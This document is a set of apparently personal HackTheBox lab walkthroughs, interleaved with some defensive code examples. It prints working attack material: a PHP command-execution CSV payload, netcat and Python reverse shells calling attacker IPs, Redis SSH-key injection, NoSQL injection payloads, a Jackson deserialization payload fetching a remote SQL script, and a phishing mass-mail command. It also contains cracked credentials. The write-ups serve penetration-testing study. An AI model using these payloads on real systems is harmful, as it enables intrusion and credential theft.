!!!!! !.?.

after googling a little, I got to know it's the Ook language; when I decoded it I got this

```
Nothing here check /asdiSIAJJ0QWE9JAS
```

## <http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/>

I got this :-\
\
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA

I decoded it with base64, saved it as a new file and then ran the file command on it, and got to know that it's a zip file\
so I saved it as file.zip and tried to unzip it, but it needs a password; then I ran fcrackzip on it and got the password = password\
\
after unzipping it I got a file index.php which contains hex :-\
\
after doing hex to text I got this :-\
\
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==\
\
another base64 decode required :- \
\
+++++ +++++ \[->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ \[->++ +<]>+ ++.<+ ++\[-> ---<] >---- --.-- ----- .<+++ +\[->+ +++<] >+++. <+++\[ ->--- <]>-- .<+++ \[->++ +<]>+ .---. <+++\[ ->--- <]>-- ----. <++++ \[->++ ++<]> ++..<\
\
another Ook decode required :-&#x20;

```
idkwhatispass
```
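The decoding chain above can be reproduced offline with this added Python decoder, which is not part of the original write-up. Short Ook writes each Brainfuck instruction as a pair of the symbols `.`, `?`, `!` (the classic form spells them "Ook. Ook?", so stripping the word "Ook" covers both), and the bracket program from the previous step is already Brainfuck syntax, so the same interpreter runs it. The bracket program is copied from the step above; the Short Ook sample is a constructed one that prints "A".

```python
# Short Ook: each pair of symbols is one Brainfuck instruction.
SHORT_OOK = {
    ".?": ">", "?.": "<", "..": "+", "!!": "-",
    "!.": ".", ".!": ",", "!?": "[", "?!": "]",
}


def ook_to_bf(text: str) -> str:
    """Translate Ook (classic or short form) to Brainfuck; whitespace is ignored."""
    symbols = [c for c in text.replace("Ook", "") if c in ".?!"]
    if len(symbols) % 2:
        raise ValueError("Ook program has an odd number of symbols")
    return "".join(SHORT_OOK["".join(symbols[i:i + 2])]
                   for i in range(0, len(symbols), 2))


def run_bf(program: str, max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter (8-bit wrapping cells, no input, step-capped
    so a malformed or looping program cannot hang the decoder)."""
    code = [c for c in program if c in "<>+-.,[]"]
    jumps, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):
        if pc >= len(code):
            return "".join(out)
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    raise RuntimeError("step limit reached")


def decode_ook(text: str) -> str:
    """Ook text straight to the printed message."""
    return run_bf(ook_to_bf(text))


# The bracket program recovered from index.php in the step above (copied from the page).
BF_FROM_PAGE = (
    "+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+ "
    "++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->--- "
    "<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..<"
)

# Constructed Short Ook sample: 65 increments then one output, i.e. it prints "A".
SAMPLE_SHORT_OOK = ".." * 65 + "!."


if __name__ == "__main__":
    print(run_bf(BF_FROM_PAGE))
    print(decode_ook(SAMPLE_SHORT_OOK))
```

Feeding the Short Ook text from success.html into `decode_ook` reproduces the "Nothing here check ..." message the same way.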

## [http://10.10.10.111:9999/playsms/](http://10.10.10.111:9999/playsms/index.php?app=main\&inc=core_auth\&route=login)

Finally we got a password, but it's not working for the Node-RED login page; it did work for the playsms page though. we got in\
\
after doing searchsploit I found an exploit which does work on playsms to get RCE

```bash
PlaySMS 1.4 - 'import.php' Remote Code Execution            | php/webapps/42044.txt

searchsploit -m php/webapps/42044.txt
```

## shell as www-data

1. visit <http://10.10.10.111:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=import>
2. create a csv file and add the payload to it

```csv
Name,Mobile,Email,Group code,Tags
<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>,22	
```

3. upload it and intercept the request in burp & change the user-agent to the command which I want to execute, e.g. whoami

<img src="/files/00qZhWTkHz89FesAs7r9" alt="" data-size="original">

4. enter the reverse shell in the user-agent

```bash
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.6 4242 >/tmp/f
```

and we get the shell as www-data

## shell as root

it requires a buffer overflow, so I skipped it

</details>

## Postman

<details>

<summary>Initial ⇒ Redis , SSH-key upload<br>Privesc ⇒ ----------</summary>

## Recon & Enumeration

#### port scan

```bash
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt
```

#### directory scan

for <http://10.10.10.160/>

```bash
/images (Status: 301)
/upload (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
```

#### website (80)

Nothing interesting over here, just a static web page with no functionality

#### <https://10.10.10.160:10000>

There is a login page powered by "WEBMIN"; by default webmin doesn't have any default credentials\
\
I also tried SQL & NoSQL injection ...... no benefit; we will look back here after a while

#### /upload&#x20;

just a bunch of images; almost none of them open or have anything interesting .... I moved on

#### redis 6379

we can connect to redis just using netcat, and we can execute commands

```bash
nc -nvv 10.10.10.160 6379
```

## shell as redis

I created an SSH public/private key pair, then used the Redis server to import the public key and save it into authorized_keys; after that, just SSH into the system as the redis user and we have the shell.\
\
Importing the SSH key:

```bash
cat new_key.txt | redis-cli -h 10.85.0.52 -x set new_key.txt
```

Saving the SSH key into authorized_keys:

```bash
redis-cli -h 10.10.10.160

10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
```
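The session above works because the instance is reachable without a password and leaves CONFIG exposed. As an added example (not from the write-up), a small Python audit of a redis.conf that flags exactly those settings; both sample configurations are constructed:

```python
"""Audit a redis.conf for the settings that let an unauthenticated client
rewrite authorized_keys as in the session above.  Added example, not part of
the original write-up; both sample configurations are constructed."""

import re

# CONFIG is what lets a client repoint `dir`/`dbfilename` at ~/.ssh/authorized_keys;
# DEBUG is the other command usually disabled alongside it.
SENSITIVE_COMMANDS = ("CONFIG", "DEBUG")


def parse_redis_conf(text):
    """Return (directives, renamed): directives maps each directive to its last
    value; renamed is the set of commands disabled or renamed via rename-command."""
    directives = {}
    renamed = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        name = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if name == "rename-command":
            # `rename-command CONFIG ""` disables the command, `rename-command CONFIG x`
            # hides it; either one breaks the dir/dbfilename trick for a stray client.
            fields = value.split()
            if fields:
                renamed.add(fields[0].upper())
        else:
            directives[name] = value
    return directives, renamed


def audit_redis_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    directives, renamed = parse_redis_conf(text)
    findings = []
    bind = directives.get("bind", "")
    # No bind line at all means Redis listens on every interface.
    if not bind or re.search(r"(^|\s)(0\.0\.0\.0|\*)(\s|$)", bind):
        findings.append("bind: listening on all interfaces")
    if directives.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode is off")
    if not directives.get("requirepass", "").strip('"'):
        findings.append("requirepass not set: unauthenticated access")
    for cmd in SENSITIVE_COMMANDS:
        if cmd not in renamed:
            findings.append(f'{cmd} reachable: add `rename-command {cmd} ""`')
    return findings


# Constructed: the shape of the service on this box (reachable, no auth, CONFIG open).
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed: the same service with the gaps closed.
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass "REPLACE-WITH-LONG-RANDOM-SECRET"  # placeholder, not a real password
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["ok"])
```

The audit cannot see the other half of the problem, that the redis account on this box has a login shell and a writable ~/.ssh; giving the service user /usr/sbin/nologin closes that side.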

## privesc redis => Matt

#### linpeas.sh

I found an SSH RSA private key for the Matt user, so I first tried it for a direct SSH login, which didn't work.\
\
Next, I extracted the key contents (hash) using ssh2john; this can also be done online.\
After extracting the hash from the key we need to crack it, and for this I used john:

```bash
python ssh2john.py matt_ssh.key > hash.txt

john --wordlist=~/chaos/rockyou.txt hash.txt
>>
computer2008
```

I used the key with the password and still failed, \
so I tried "su - Matt" in the shell I already had, and that succeeded: I got the shell as Matt.

## privesc Matt  =>  root

These credentials also work for the web page we found earlier, \
but we more or less need a Metasploit payload to finish it, so I skipped it.

</details>

## Mango

<details>

<summary>Initial ⇒ No-SQL-injection , Enumerating database &#x26; finding credentials<br>Privesc ⇒ linpeas.sh , Binary exploitation (jjs)</summary>

## port scan

Ports 22, 80 and 443 are open \
script scan: gives us the name of the domain running on port 80\
domain name: staging-order.mango.htb

## website (80)

The page returns 403 Forbidden when accessed by IP address; we have to add the host to /etc/hosts before we can access it.\
Yes, now it works, with an admin panel on it.

## directory scan

I ran two directory scans, one for <http://staging-order.mango.htb> & the other for <https://10.10.10.162>

### <http://staging-order.mango.htb>

```bash
/home.php
/index.php
/vendor                            >> brute force again
/vendor/collection/installed.json
```

I found some PHP and JSON files in this directory, and this particular JSON file turned out to be useful:

```bash
http://staging-order.mango.htb/vendor/composer/installed.json
```

After reading the file I learned that the application uses MongoDB on the server side, which gives us a reason to test for NoSQL injection.

### <https://10.10.10.162/>

```
/index.php        >  home page
/analytics.php    >  i found nothing useful here
```

## No-sql injection

## shell as mango

I used a payload to bypass the authentication, but there is nothing inside; I need credentials. Since we are dealing with NoSQL we can use payloads or a script to retrieve data.\
\
I used a script, but here are some manual payloads as well:

```uri
username[$ne]=abc&password[$ne]=xyz&login=login    > to bypass authentication

username[$regex]=abc&password[$ne]=xyz&login=login    > brute-forcing username

username[$regex]=a    >    checking that particular alphabets "a" come in name or not

=a    >    checking alphabet existence
=^a   >    checking the first alphabet of username
=^a.* >    full-payload 
```
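How those payloads become MongoDB operators, and the check that stops them, as an added example that is not the box's PHP code: a Python stand-in for the login with a constructed user list and a tiny matcher for `$ne`/`$regex`:

```python
"""A Python stand-in for the login on this box, showing how the payloads above
turn into MongoDB operators and the type check that stops them.  Added example,
not the application's PHP; USERS and the secrets are constructed."""

import re
from urllib.parse import parse_qsl

# Constructed users; a real app would store hashes, plain strings keep the demo short.
USERS = [
    {"username": "admin", "password": "admin-PLACEHOLDER-secret"},
    {"username": "mango", "password": "mango-PLACEHOLDER-secret"},
]


def php_style_parse(query):
    """Emulate PHP's bracket syntax: 'username[$ne]=abc' -> {'username': {'$ne': 'abc'}}.
    This is the step that turns a form field into an operator object."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            base, sub = key[:-1].split("[", 1)
            params.setdefault(base, {})[sub] = value
        else:
            params[key] = value
    return params


def _field_matches(actual, expected):
    """Tiny subset of MongoDB matching: equality, $ne and $regex."""
    if not isinstance(expected, dict):
        return actual == expected
    for op, arg in expected.items():
        if op == "$ne":
            if actual == arg:
                return False
        elif op == "$regex":
            if actual is None or not re.search(arg, actual):
                return False
        else:
            raise ValueError(f"operator not modelled here: {op}")
    return True


def find(users, query_filter):
    """Return every user document matching all fields of the filter."""
    return [u for u in users
            if all(_field_matches(u.get(k), v) for k, v in query_filter.items())]


def login_vulnerable(query):
    """Hands the parsed fields straight to the filter, as the box's login does:
    `$ne` matches every account, `$regex` lets a username be guessed by prefix."""
    p = php_style_parse(query)
    return find(USERS, {"username": p.get("username"), "password": p.get("password")})


def login_safe(query):
    """Same flow, but only plain strings may reach the filter, so no operator
    object can be built from the request."""
    p = php_style_parse(query)
    username, password = p.get("username"), p.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("non-string credential field: operator injection attempt")
    return find(USERS, {"username": username, "password": password})


def rejects(query):
    """True if login_safe refuses the query; the same test makes a log-side detection rule."""
    try:
        login_safe(query)
    except ValueError:
        return True
    return False
```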

I got credentials; now let's try SSH.\
I tried the admin creds first and failed, so I tried the mango creds and BOOM...... we are in

## privesc mango => admin

Switch user and enter the password we found using the NoSQL injection:

```bash
su - admin
```

## privesc admin => root

#### linenum.sh

I found a binary named "jjs" at "/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs" with the SUID bit set\
Let's do some searching: I found an entry on GTFOBins\
\
It is a Java binary which can be used for:\
file read\
file write\
reverse shell\
and some more functionalities ......\
\
I first tried the reverse shell, but I got the shell again as the admin user, and I need it as the root user\
\
Next I tried file read, but it wouldn't work for me, so the only option left is to write a file\
\
So I decided to write an SSH key using jjs, and came back to my machine:

```bash
ssh-keygen
```

I named the file "mango" and got one private key "mango" & one public key "mango.pub"\
\
We write the public key to the target machine and use the private key to log in, \
so I copied the contents of "mango.pub" and pasted it into the jjs file-write payload with \
directory = /root/.ssh/authorized\_keys\
\
Login using the private RSA key:

```bash
ssh -i mango root@10.10.10.162
```

and BOOM...... we got the shell as root

</details>

## Traverexec

<details>

<summary>---</summary>

</details>

## Openadmin

<details>

<summary>Initial ⇒ ----</summary>

</details>

## Magic

<details>

<summary>Initial ⇒ Auth bypass via sql-inj OR Match-&#x26;-Replace 302 to 200  (EAR) +  file upload<br>Privesc level 1 ⇒ Database creds in /var/www/magic  +  Data dump using mysqldump<br>Privesc level 2 ⇒ -----------------------</summary>

## Recon & Enum

#### port scan

```bash
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

#### directory scan

```bash
/assets (Status: 301) [Size: 313]
/images (Status: 301) [Size: 313]
/index.php (Status: 200) [Size: 5069]
/index.php (Status: 200) [Size: 5067]
/login.php (Status: 200) [Size: 4221]
/logout.php (Status: 302) [Size: 0]
/upload.php (Status: 302) [Size: 2957]
```

## website

There are a bunch of images on the web page, and there is also login functionality in the bottom-left corner of the page

<img src="/files/I2WnIhJOyLc3n5nUyZGO" alt="" data-size="original">

### <http://10.10.10.185/login.php>

This can be bypassed using an SQL authentication bypass; after logging in we get redirected to /upload.php, which has a file upload vulnerability

### <http://10.10.10.185/upload.php>

If we visit this page directly it redirects us to /login.php, but when the response is intercepted in Burp, the page content and page size show that it is the same page (execution after redirect),\
\
To bypass this, use Burp Match and Replace to change 302 Found -> 200 OK

<img src="/files/5wZUgfiNcLvt4NCtg4Ct" alt="" data-size="original">

## shell as www-data

#### file upload exploitation

We can use 2 methods to exploit this vulnerability:\
\
1\. use exiftool to inject the reverse shell into the image we are uploading\
\
2\. inject the payload in the middle of the image file's content\
\
I used the second, and got the shell

## privesc www-data => theseus

After getting the shell, I found one more file inside the /var/www/magic directory

#### db.php5

This is the MySQL config file; after reading it we get the MySQL credentials of user theseus\
but unfortunately the mysql client is not present on the machine. mysqldump is present though, so we can use that:

```bash
mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic
```

After the dump we got the result, and inside it I found this row, which I think is interesting:

```sql
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
```

I used the **su** command with creds username = theseus & pass = Th3s3usW4sK1ng, and got the shell

## privesc theseus => root

#### linenum.sh

Found an unknown binary, /bin/sysinfo, which also executes as root

</details>

## Admirer

<details>

<summary>Initial ⇒ SSRF to My-SQL fake server (attacker server)<br>Privesc ⇒ Path Hijacking (PYTHONPATH) , Scripting Library (shutil.py) &#x26; function</summary>

1. Nmap gives ports 21, 22 and 80 open, with a disallow entry `admin-dir` in robots.txt
2. Recon on http\://$ip/admin-dir gives 2 .txt files
   1. contacts.txt ⇒ holds email addresses & usernames (NO USE)
   2. credentials.txt ⇒ holds the FTP username & password
3. Logging in to FTP & enumerating it gives us files:
   1. dump.sql ⇒ (nothing interesting except the database name: admirerdb)
   2. html.tar.gz ⇒ extracting it gives some directories and files; the interesting ones:
      1. /utility-scripts
      2. /utility-scripts/dbadmin.php (holds username `waldo`, password & database)
4. Enumerating `http://$ip/utility-scripts` gives `adminer.php`, which has a MySQL connect form on it (tried the creds I found, but they didn't work)
5. Using the `server` field we can also connect to a remote server, so I set up MySQL on my attacking machine with a user/pass; logging in to it from there works
6. Once inside, I loaded a local file from the target, and viewing it gives me other creds for `waldo`, which work for SSH
7. Inside the SSH session, `sudo -l` gives a file, /opt/scripts/admin\_task.sh, for which SETENV is allowed; reading it shows that `function 6` runs the script `/opt/scripts/backup.py`
8. backup.py imports make\_archive from the shutil library
9. Create a `shutil.py` file/library inside the /tmp directory with a reverse shell in it:

```python
import socket
import subprocess
import os
import pty

def make_archive(a, b, c):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("10.0.0.1",4242)) #change this with your ip port
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        pty.spawn("/bin/bash")
```

10. Exploit it using the sudo right on the PATH variable (SETENV) together with the right on `/opt/scripts/admin_task.sh`:

```bash
sudo PYTHONPATH=/tmp /opt/scripts/admin_task.sh
```
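The mechanism behind steps 9 and 10, and the interpreter flag that defeats it, as an added example (not the box's backup.py): a decoy `shutil.py` placed in a PYTHONPATH directory wins over the standard library unless Python runs with `-I`, which ignores PYTHONPATH; the decoy is constructed and only sets a marker.

```python
"""Demonstrates the import shadowing used above and the interpreter flag that
defeats it: a shutil.py in a PYTHONPATH directory is imported before the
standard library, unless Python runs in isolated mode (-I), which ignores
PYTHONPATH entirely.  Added example, not the box's backup.py; the decoy module
is constructed and only sets a marker."""

import os
import subprocess
import sys
import tempfile
import textwrap

# Constructed decoy: same module name as the stdlib one, but harmless.
DECOY_SHUTIL = textwrap.dedent("""\
    SHADOWED = True  # marker so the child interpreter can report which shutil it got

    def make_archive(*args, **kwargs):
        return "decoy make_archive called"
""")

# Child interpreter prints True if it imported the decoy, False for the real module.
PROBE = "import shutil; print(getattr(shutil, 'SHADOWED', False))"


def decoy_wins(pythonpath_dir, isolated):
    """Spawn a child interpreter with PYTHONPATH=pythonpath_dir and report whether
    `import shutil` resolved to the decoy (True) or the real stdlib module (False)."""
    env = dict(os.environ, PYTHONPATH=pythonpath_dir)
    cmd = [sys.executable] + (["-I"] if isolated else []) + ["-c", PROBE]
    result = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)
    return result.stdout.strip() == "True"


def run_demo():
    """Returns {'default': True, 'isolated': False} on a normal CPython install."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "shutil.py"), "w") as fh:
            fh.write(DECOY_SHUTIL)
        return {
            "default": decoy_wins(tmp, isolated=False),
            "isolated": decoy_wins(tmp, isolated=True),
        }


if __name__ == "__main__":
    for mode, shadowed in run_demo().items():
        print(f"{mode:8s} -> shutil shadowed by PYTHONPATH: {shadowed}")
```

On the box the fix is in sudoers as much as in the script: dropping SETENV from the rule lets sudo's default env_reset strip PYTHONPATH again, and `#!/usr/bin/python3 -I` on the script makes it ignore the variable even when it is passed.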

</details>

## Blunder

<details>

<summary>------</summary>

</details>

## Tabby

<details>

<summary>-------</summary>

</details>

## Doctor

<details>

<summary>Initial ⇒ via SSTI  or   via Command Injection<br>Privesc level 1 ⇒ Password in <code>/var/log/apache2/.backup</code> <br>Privesc level 2 ⇒ -------------------------</summary>

## Recon & Enum

### port scan

```bash
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8089/tcp open  unknown
```

### directory scan (<http://10.10.10.209>)

```bash
/.html                (Status: 403) [Size: 277]
/contact.html         (Status: 200) [Size: 19848]
/images               (Status: 301) [Size: 313] [--> http://10.10.10.209/images/]
/blog.html            (Status: 200) [Size: 19848]
/.php                 (Status: 403) [Size: 277]
/about.html           (Status: 200) [Size: 19848]
/services.html        (Status: 200) [Size: 19848]
/js                   (Status: 301) [Size: 309] [--> http://10.10.10.209/js/]
/departments.html     (Status: 200) [Size: 19848]
/fonts                (Status: 301) [Size: 312] [--> http://10.10.10.209/fonts/]
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 19848]
/images               (Status: 301) [Size: 313] [--> http://10.10.10.209/images/]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/about.html           (Status: 200) [Size: 19848]
/contact.html         (Status: 200) [Size: 19848]
```

### directory scan (<http://doctors.htb>)

```bash
Target: http://doctors.htb/

[14:41:07] Starting:
[14:43:06] 302 -  251B  - /account  ->  http://doctors.htb/login?next=%2Faccount
[14:43:07] 404 -    3KB - /account/login.rb
[14:43:07] 404 -    3KB - /account/login.shtml
[14:44:16] 200 -  101B  - /archive
[14:46:28] 302 -  245B  - /home  ->  http://doctors.htb/login?next=%2Fhome
[14:46:51] 200 -    4KB - /login
[14:46:54] 302 -  217B  - /logout  ->  http://doctors.htb/home
[14:47:54] 200 -    1KB - /register
[14:48:03] 403 -  276B  - /server-status
[14:48:03] 403 -  276B  - /server-status/
[14:48:41] 200 -    1KB - /user/admin
```

## website (<http://10.10.10.209>)

I found nothing useful here, but I did find a mail address (info.doctors.htb), so let's add doctors.htb to /etc/hosts and check

## website (<http://doctors.htb>)

We get a login page and also a sign-up function, so let's create an account here \
\
After getting in we get a message function which consists of 2 parameters

<img src="/files/GAlqdS8InzoJajky9yg2" alt="" data-size="original">

After posting a message it looks like this:

<img src="/files/0qNntNau6Ur9tA8a9yZm" alt="" data-size="original">

## shell as web

Both parameters are vulnerable. Parameter 1 is vulnerable to SSTI & XSS; parameter 2 is vulnerable to command injection

### SSTI

I injected payloads, but none of them worked until I checked /archive; 9x9 didn't give any result, so I didn't think it was vulnerable to SSTI, but 8x8 worked for me

<img src="/files/C1po9Sl119bVgkLBjZTX" alt="Request /post/new" data-size="original">

<img src="/files/7JTwimLNqhNbqdyD9y1Y" alt="Response /archive" data-size="original">

It's working; let's get a reverse shell

<img src="/files/aI4qG3xjA0vBNNHH02Ep" alt="request 1  /post/new" data-size="original">

<img src="/files/Sh2kEbiVaVspFflOO8C1" alt="request 2  /post/new" data-size="original">

I thought it didn't work, but we have to send the request to /archive as well; after hitting send from /archive I got this response, and the reverse shell as well

<img src="/files/L1gfUgtojzZyz17HAeNW" alt="response  /archive" data-size="original">

### command injection

I started testing it by injecting my IP, but it gave an error

<img src="/files/RbOxKoUelVoNAYkaCrtR" alt="" data-size="original">

Trying the $IFS payload, and it worked:

<img src="/files/IPcNHJEPypf1XKKeDb27" alt="" data-size="original">

After that I just ran bash /dev/shm/exploit, and I got the reverse shell
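Why `$IFS` got past the filter, as an added example that is not the Doctor application's code: a check that only rejects spaces passes `$IFS`, while a strict target allowlist plus an argv list (no shell) leaves nothing for a shell to expand; all inputs are constructed.

```python
"""Denylist versus allowlist for a ping-style parameter.  Added example, not the
Doctor application's code; all inputs are constructed."""

import ipaddress
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.IGNORECASE)


def naive_space_filter(target):
    """A 'no spaces allowed' check: $IFS contains no literal space, so it passes."""
    return " " not in target


def vulnerable_command(target):
    """The string a shell=True call would hand to /bin/sh -c; the shell expands
    $IFS into a word separator, so the rest of the value becomes a command."""
    return f"ping -c 1 {target}"


def build_ping_argv(target):
    """Accept an IP address or hostname only and return an argv list for
    subprocess.run(argv) (shell=False), so no shell ever sees the value."""
    target = target.strip()
    try:
        ipaddress.ip_address(target)
    except ValueError:
        if not HOSTNAME_RE.match(target):
            raise ValueError(f"rejected target: {target!r}")
    return ["ping", "-c", "1", target]


def is_accepted(target):
    """Convenience wrapper: True if build_ping_argv would allow the value."""
    try:
        build_ping_argv(target)
    except ValueError:
        return False
    return True
```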

## privesc web => shaun

```bash
grep -r passw . 2>/dev/null
```

and I found this:

```
./apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
```

I tried **su -** with username = shaun & password = Guitar123, and I got the shell

## privesc shaun => root

</details>

## Sneakymailer

<details>

<summary>Initial ⇒ Recon , Phishing , -----<br>Privesc ⇒ ----</summary>

## Recon & Enum

### port scan

```bash
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
143/tcp  open  imap
993/tcp  open  imaps
8080/tcp open  http-proxy
```

nmap gives the domain name <http://sneakycorp.htb>

### directory scan

### subdomain scan

```bash
http://dev.sneakycorp.htb
```

## website

### <http://sneakycorp.htb/team.php>

The page consists of names and emails, nothing more. I can download all the users' email addresses:

```bash
curl http://sneakycorp.htb/team.php -o mails.txt

cat mails.txt | grep '@' > new.txt

cat new.txt | cut -d '>' -f 2 | cut -d '<' -f 1 > mails.txt
```

### <http://dev.sneakycorp.htb/pypi/register.php>

A registration page, but no redirect happens and no action is performed

## shell as www-data

### phishing users

I will try sending a phishing mail containing my IP address in the message body, with a Python HTTP server open on my machine \
If any user clicks on my IP address I will get a callback

```bash
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
```

I did get a callback on the Python server; now I open nc to check what I receive

```bash
firstName=Paul
lastName=Byrd
email=paulbyrd@sneakymailer.htb
password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
```

I got creds for Paul

</details>

## Passage

<details>

<summary>---</summary>

</details>

## Lunanne

<details>

<summary>Initial ⇒ ---</summary>

</details>

## Time

<details>

<summary>Initial ⇒ Recon , Open-Exploit (com.fasterxml.jackson.databind)<br>Privesc ⇒ Linpeas.sh , ----</summary>

## Recon & Enum

#### Port scan

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
```

#### Directory scan

```bash
```

## WEB (80)

There is a **json** beautifier & validator on the website; after testing it, the beautifier turns out to be of no use for us, so the only thing left is the validator\
\
Basically, if we input JSON data it validates it and responds accordingly,\
but if we input non-JSON data it gives us an error:

```bash
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object
```

After googling and reading walkthroughs, I found that this is CVE-2019-12384

## Shell as pericles

There is a public exploit available on GitHub through which we can go from SSRF to RCE\
\
Steps to reproduce:\
\
1\. clone the git repository on your machine\
\
2\. open and edit the SQL file and enter the command you want executed on the target machine/server; in my case a reverse shell\
\
3\. start an HTTP server on your local machine\
\
4\. edit the payload accordingly: IP address, port number, SQL file name\
\
5\. replace every "\\" with " " (blank space) using the echo command:

```bash
echo "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"  
```

final payload :-

```bash
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.16.4:8000/inject.sql'"}]
```

Turn on the netcat listener on your machine, and BOOM.......... we got the shell

## privesc pericles => root

</details>

## Ready

<details>

<summary>Initial ⇒ SSRF -> redis RCE (open-exploit)<br>Privesc ⇒ Backup file in /opt</summary>

1. On port 5080 a website is running GitLab; enumeration gives us the outdated version `(11.4.7)`
2. Open exploit available; for an explanation of the vulnerability refer to
